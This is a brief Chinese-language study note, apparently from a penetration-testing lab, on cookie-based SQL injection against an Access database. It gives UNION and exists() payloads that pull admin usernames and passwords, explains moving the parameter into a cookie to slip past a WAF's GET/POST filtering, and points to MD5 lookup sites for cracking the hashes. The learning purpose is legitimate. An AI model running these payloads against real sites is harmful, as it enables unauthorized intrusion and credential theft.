cookie注入学习笔记

cookie注入学习笔记,第1张

一、cookie 注入
绕过waf(防火墙)拿到管理员账号及密码。

1、access联合注入
2、cookie注入
3、md5加密

猜测的表名:user、admin
?id=191 union select 1,2,3,4,5,6,7,8,9,10 from admin
access数据库union查询后,优先显示后表查询出的内容
刚好和mysql显示顺序相反,语法也限制更大(access查询语法要求加表名)

探测表名:exists()
?id=191 and exists(select * from admin)
?id=191 and exists(select username,password from admin)
收集常见的用户表名称、字段名称

非法传参拦截:
?id=191 and 1=1
报错为【说明进行了特殊过滤/处理】

请不要在参数中出现: and update delete;insert mid master等非法字符!

提交数据大多时候是get\post方式,有时可能使用cookie提交,并对get\post进行了拦截

判断是否可以通过cookie进行传参
id=171+order+by+10
id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
id=171+union+select+1,2,3,4,5,6,username,password,9,10+from+admin

删除参数报错后,火狐浏览器f12,点击存储,在cookie下新增一行,key、value(id、171)


插件:
火狐浏览器 --》附加组件--》搜索cookie或ModHeader【几乎都可以用】


如ModHeader:
——cookie自动补全才有效,value改成id=171
——打钩表示使用
——cookie里面的空格要使用+号来代替

 

md5:字母+数字的结合16位或32位,md5就是文本处理,所谓的md5破解就是撞库
如:https://www.cmd5.com
       https://www.somd5.com

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/langs/739171.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-04-28
下一篇 2022-04-28

发表评论

登录后才能评论

评论列表(0条)

保存